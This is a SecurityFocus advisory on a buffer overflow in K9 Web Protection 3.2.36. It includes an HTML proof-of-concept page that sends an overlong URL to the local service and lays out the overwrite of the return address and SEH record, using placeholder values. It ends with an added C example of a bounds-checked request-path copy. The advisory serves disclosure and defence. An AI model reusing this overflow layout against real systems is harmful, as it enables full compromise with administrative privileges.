source: http://www.securityfocus.com/bid/24373/info

K9 Web Protection is prone to a buffer-overflow vulnerability because it fails to perform sufficient boundary checks on user-supplied data before copying it to a buffer.

An attacker could leverage this issue to execute arbitrary code with administrative privileges. A successful exploit could result in the complete compromise of the affected system.

K9 Web Protection 3.2.36 is reported vulnerable; other versions may be affected as well.

<html>
<head>
<title>CSIS.DK - BlueCoat K9 Web Protection Overflow</title>
<center>
</center>
</head>
<body>
<h4><center> Discovery and Exploit by Dennis Rand - CSIS.DK</center></h4>
<br><b>http://127.0.0.1:2372/home.html[A x 168][DCBA][A x 56][BBBB][AAAA] </b><br>
<br><li> Return Address = DCBA
<br><li> Pointer to the next SEH record = BBBB
<br><li> SE Handler = AAAA
<br>
<center>
<b><A
HREF="http://127.0.0.1:2372/home.htmlAAAAAAAAAAAAAAAABBBBBBBBBBBBBBBBCCCCCCCCCCCCCCC
CDDDDDDDDDDDDDDDDEEEEEEEEEEEEEEEEFFFFFFFFFFFFFFFFGGGGGGGGGGGGGGGGHHHHHHHHHHHH
HHHHaaaaaaaaaaaaaaaabbbbbbbbbbbbbbbbccccccccDCBAAAAAAAAAAAAAAAAABBBBBBBBBBBBBBBBCCC
CCCCCCCCCCCCCDDDDDDDDaaaabbbb">RUN PoC</A></b>
</center>
</body>
</html>
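
The missing boundary check described in the advisory above, shown from the fixing side: an added example (not code from K9 Web Protection or from the original advisory) of a request-line handler that measures the request target before copying it into a fixed buffer and rejects anything that does not fit. The function name, the status codes returned and the 128-byte buffer size are assumptions; the page does not give the real buffer size.

```c
#include <stdio.h>
#include <string.h>

#define PATH_BUF_LEN 128   /* assumed size, not taken from the product */

/* Copy the request target of an HTTP request line into dst.
 * Returns 200 on success, 400 for a malformed line, and 414 when the
 * target would not fit in dst. On any error dst is left as "". */
int extract_request_path(const char *request_line, char *dst, size_t dst_len)
{
    if (dst == NULL || dst_len == 0)
        return 400;
    dst[0] = '\0';
    if (request_line == NULL)
        return 400;

    /* The method ends at the first space; the target must start with '/'. */
    const char *sp = strchr(request_line, ' ');
    if (sp == NULL || sp == request_line || sp[1] != '/')
        return 400;
    const char *path = sp + 1;

    /* Measure the target first: it ends at the next space or line end. */
    size_t path_len = strcspn(path, " \r\n");

    /* The boundary check: leave room for the terminating NUL. */
    if (path_len >= dst_len)
        return 414;

    memcpy(dst, path, path_len);
    dst[path_len] = '\0';
    return 200;
}

int main(void)
{
    char path[PATH_BUF_LEN];
    char filler[237];
    char request[512];

    /* Constructed sample: 236 filler bytes after /home.html, the total
     * of the 168 + 4 + 56 + 4 + 4 layout listed on the page. */
    memset(filler, 'A', sizeof filler - 1);
    filler[sizeof filler - 1] = '\0';
    snprintf(request, sizeof request, "GET /home.html%s HTTP/1.1\r\n", filler);

    printf("normal:   %d\n", extract_request_path("GET /home.html HTTP/1.1\r\n", path, sizeof path));
    printf("overlong: %d\n", extract_request_path(request, path, sizeof path));
    return 0;
}
```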